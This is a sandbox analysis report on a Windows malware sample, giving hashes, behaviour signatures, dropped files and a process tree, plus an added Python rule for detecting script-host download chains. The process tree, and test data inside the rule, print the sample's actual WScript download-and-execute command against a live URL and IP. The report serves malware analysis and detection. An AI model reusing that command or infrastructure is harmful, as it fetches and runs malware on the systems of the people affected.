Analysis

  • max time kernel
    121s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240215-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240215-en, locale:en-us, os:windows7-x64, system
  • submitted
    26/05/2024, 03:17

General

  • Target

    742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    742be332927d3c9215c11e47cefd0e51

  • SHA1

    6571a761199ad23e12185dbae9f21e6136bf8342

  • SHA256

    065183bc01f4117eea2408f6625a9b0d238fec9f251d2538b02abaacd2cf7106

  • SHA512

    8c249cd46c4b63f876a9b22f1c96d061c542070bc35cc1cc460e432601d245a573fcce2595240f295e90c11b71056a016bc7305fd47b2de9710bdbdef65700ea

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3w:/7BSH8zUB+nGESaaRvoB7FJNndn1

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request (11 IoCs)
  • Command and Scripting Interpreter: JavaScript (1 TTP)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory (20 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:2004
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:2356
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:2668
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:1892
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf1130.exe
      2⤵
      • Blocklisted process makes network request
      PID:2092
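
The process tree above is a plain download-and-execute chain: the submitted EXE drops fuf1130.js into %TEMP% and runs it through WScript.exe, passing a URL and an output path (C:\...\fuf1130.exe) as script arguments. Two things are worth noting before writing a rule for it. First, the logged image is C:\Windows\SysWOW64\WScript.exe while the command line asks for C:\Windows\System32\WScript.exe; that is WOW64 file-system redirection for a 32-bit parent, not tampering, so match on the host's basename rather than its full path. Second, the same invocation appears five times with different PIDs and fuf1130.exe never shows up in the files written below, consistent with a download that did not succeed in the sandbox. The following is an added detection example (it is not part of this report and not the sandbox vendor's logic) that runs over process-creation records; the ProcEvent fields, regexes and the two benign events are assumptions constructed for the example, while the first event is taken from the tree above.

```python
"""Flag script hosts handed a URL and an .exe output path from user-writable
locations, as in the WScript.exe launches above. Added example, not from the report."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Script hosts that pass leftover arguments to the script via WScript.Arguments.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh")
URL_RE = re.compile(r"^https?://", re.IGNORECASE)
# Directories an unprivileged user can write to (assumed list for this example);
# a script or parent living here is the suspicious case, a logon script in
# System32 or on the domain share is not.
USER_WRITABLE_RE = re.compile(
    r"\\(?:AppData\\(?:Local\\Temp|Roaming|LocalLow)|Users\\Public|ProgramData|Downloads)\\",
    re.IGNORECASE,
)


@dataclass
class ProcEvent:
    """Minimal process-creation record (the fields Sysmon EID 1 / 4688 carry)."""
    pid: int
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def argv(command_line: str) -> List[str]:
    """Split a Windows command line on whitespace, honouring double quotes."""
    return [tok.strip('"') for tok in re.findall(r'"[^"]*"|\S+', command_line)]


def classify(ev: ProcEvent) -> Optional[str]:
    """Return the matched indicators joined by ';', or None if the event is clean.
    The image is compared by basename: a 32-bit parent asking for
    System32\\WScript.exe is redirected by WOW64 to SysWOW64\\WScript.exe,
    so the logged image path and the command line legitimately disagree."""
    if basename(ev.image) not in SCRIPT_HOSTS:
        return None
    args = argv(ev.command_line)[1:]  # drop the host executable itself
    script = next((a for a in args if a.lower().endswith(SCRIPT_EXTS)), None)
    if script is None:
        return None
    urls = [a for a in args if URL_RE.match(a)]
    exes = [a for a in args if a.lower().endswith(".exe")]
    reasons = []
    if USER_WRITABLE_RE.search(script):
        reasons.append("script in user-writable dir")
    if USER_WRITABLE_RE.search(ev.parent_image):
        reasons.append("parent in user-writable dir")
    if urls:
        reasons.append("url argument")
    if exes:
        reasons.append("exe path argument")
    # Fire on the URL + output-path pair plus at least one location signal.
    if urls and exes and len(reasons) >= 3:
        return "; ".join(reasons)
    return None


def flagged(events: List[ProcEvent]) -> Dict[int, str]:
    """Map PID -> reason for every event classify() flags."""
    hits: Dict[int, str] = {}
    for ev in events:
        reason = classify(ev)
        if reason:
            hits[ev.pid] = reason
    return hits


EVENTS = [
    # Taken from the process tree in this report (PID 2004).
    ProcEvent(2004,
              r"C:\Users\Admin\AppData\Local\Temp\742be332927d3c9215c11e47cefd0e51_JaffaCakes118.exe",
              r"C:\Windows\SysWOW64\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf1130.js" '
              r"http://www.djapp.info/?domain=lXYVhUOlKL.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300 "
              r"C:\Users\Admin\AppData\Local\Temp\fuf1130.exe"),
    # Constructed benign events, not from the report: licensing check and a logon script.
    ProcEvent(4100, r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cscript.exe",
              r"cscript.exe //nologo C:\Windows\System32\slmgr.vbs /dlv"),
    ProcEvent(4212, r"C:\Windows\System32\userinit.exe", r"C:\Windows\System32\wscript.exe",
              r"wscript.exe \\corp.example\netlogon\logon.vbs"),
]

if __name__ == "__main__":
    for pid, reason in flagged(EVENTS).items():
        print(pid, reason)
```

The rule deliberately keys on the argument shape (a URL and an .exe path handed to a script in a user-writable directory) rather than on the djapp.info domain or the fuf1130 filename, both of which a campaign rotates freely; in production the benign allow-cases would come from your own baseline of script-host invocations rather than the two constructed here.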

Network

        MITRE ATT&CK Enterprise v15

        Downloads

        Of the files below, only fuf1130.js is written by the sample itself. The CryptnetUrlCache entries and the Cab*.tmp/Tar*.tmp files are CryptoAPI artifacts of certificate chain and revocation fetching during the run, and the Content.IE5 and Cookies entries are WinINet's cache of the HTTP exchange the script performed; the expected output fuf1130.exe is absent.

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          1KB

          MD5

          dd3850d9ce5a33ba453ba4d1dfb4ba51

          SHA1

          df05b044dd14e7d009aad0398686bbfd6fff1491

          SHA256

          e9e041a83d7f3dbd6adfeda50b7ff9d3fd1abfcfb4fc5906d481c33db7072b85

          SHA512

          ec27ccc61d0133a76a612d5ddde2c6193f96302e17f66a75da8e1ad18ee871fe6b307e535317726449dc724331d4f48376d03201ad8d9dc2985aa0420d45b8e4

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          724B

          MD5

          8202a1cd02e7d69597995cabbe881a12

          SHA1

          8858d9d934b7aa9330ee73de6c476acf19929ff6

          SHA256

          58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

          SHA512

          97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

          Filesize

          410B

          MD5

          69e8173ede06b40a095a6207332d260c

          SHA1

          c2749497e8506e99a085d1a7f4a80fa2235d4fcb

          SHA256

          7c505b7e44fe709d6b9e55e1a5d09025cd3962a169be97acceb82929ee894e81

          SHA512

          9b4df2d82d0908a12d35190b14374887077c98255963d3b899cf40bf067591c9d4420ee5ee28b075edd878bd52fd6c164ea8f4c9003fc1fb35715131d9613c7a

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

          Filesize

          344B

          MD5

          1dc7afbaabfb27af8ce2ce784ee375e8

          SHA1

          3ab47a21e10ed815f7d6a74e03337886976537ac

          SHA256

          31d9ffc822d6c77e6665a1d97a416a2602a9e1e775f32ade75ecc3eee3557c9e

          SHA512

          895a778711bc16573215e3293f3aa21bda52c1599cb3719b520bdf9053e00d8f2b2e2058bf4ee97c1693e4b79d7103f666e06b96f143aece19320eb2e45dc5f4

        • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

          Filesize

          392B

          MD5

          f42a12f1f39fc7b984c8aff5dc07cbe7

          SHA1

          b76b8cd52a1a4add8f504fd2310c34d0a7157754

          SHA256

          2d043bb14d90baa75356a46ef039c8f5b975d6ad2317040bb686f69514ddd0a7

          SHA512

          10a68fb9b8361bd764c7a7b5cced12c15bdab34137b0d40e5bbf8ef56e9c95785e5db7b70e6a48d9e5efce26c4aebb02181075a5a28a65da799864d806e03b62

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

          Filesize

          6KB

          MD5

          9f2bc8cac28bc3b78936c1715e6b404a

          SHA1

          569dc5054683f2cac6fa4fd2819e2553f51c5b02

          SHA256

          8051ca3b8366cf7884f9c88cbb4a9605e0c189b4f2d7eb6a48cfde8f9f457b88

          SHA512

          b24d6a99966e5d2c355420e03d5e5c601fafc4c70a68edb6158a8b948e7e1993a35a03ff2101b007eac247c2de8732621ea656907571a530054477357748f44d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

          Filesize

          40KB

          MD5

          63dec8725452b8b20569682997eea84f

          SHA1

          9ab34d2f2a58212c7618b8248abbb843c554037c

          SHA256

          221ebeba1fb201dbceb1258da93f159cdff75ff3e4bd1c77f09ab64410212a70

          SHA512

          35228957e0c0867629afb473846b7c405416e02f2b65e87853909b8b96458cefd2b9d373ab3109c16005c70581741e136771c24ba3c3324a02a6b769c169c695

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

          Filesize

          40KB

          MD5

          4111118421f57b050e46ceccf8b6ced0

          SHA1

          76d92b74fbf5f6c1d39d97a96a8d71ddacd5ad3c

          SHA256

          34f0d697d6eb41be89e722c651e9a0ecf00307f64969388b164fdcdd8038dfa8

          SHA512

          f59b0a141a5020683a9850477a07b183ec40792f01b8d6be6fe92d54bc47b9d3a137a552dbb6a4db0e74e19389257d4d367f963a4552fa64b4f68181daa3493a

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

          Filesize

          40KB

          MD5

          cd853adc85a57676032ca5b5b534eb55

          SHA1

          a896642fb6a2ffee080bf03eb68944f746a56801

          SHA256

          04cba2319204665ddc2b3927c8869b555ca8f4f85d673e2940c80ab0b810f0bf

          SHA512

          f9cdd008e4955902f2241cf30ecc5843da88e3e2f6577c8e882fa264f1691b21aeab3fe9cd83f442c4e544a6fee17e6ebf6e333d0f7a012eb73b1a8da9594b41

        • C:\Users\Admin\AppData\Local\Temp\Cab405A.tmp

          Filesize

          65KB

          MD5

          ac05d27423a85adc1622c714f2cb6184

          SHA1

          b0fe2b1abddb97837ea0195be70ab2ff14d43198

          SHA256

          c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

          SHA512

          6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

        • C:\Users\Admin\AppData\Local\Temp\Tar58CB.tmp

          Filesize

          171KB

          MD5

          9c0c641c06238516f27941aa1166d427

          SHA1

          64cd549fb8cf014fcd9312aa7a5b023847b6c977

          SHA256

          4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

          SHA512

          936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

        • C:\Users\Admin\AppData\Local\Temp\fuf1130.js

          Filesize

          3KB

          MD5

          3813cab188d1de6f92f8b82c2059991b

          SHA1

          4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

          SHA256

          a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

          SHA512

          83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\PPA2MUFY.txt

          Filesize

          177B

          MD5

          aace5e9bfbc63533e58680ab3e35717e

          SHA1

          6eb451ad9a44b0ac552891a88b7f9bf3b194cc2a

          SHA256

          dc05c230bd0c5fefebbd9e3c121fa4ad611e3bf5aa344e570d9fa7ad61fda3e5

          SHA512

          c2813c67e03f374b48c6eb2f737cb5b6bcf7025a3b8a061ab10e4bb423755cbfd77d3fce17c4f44a57f892891959a1bf9957239ee43eb119c9c7ded3c487af35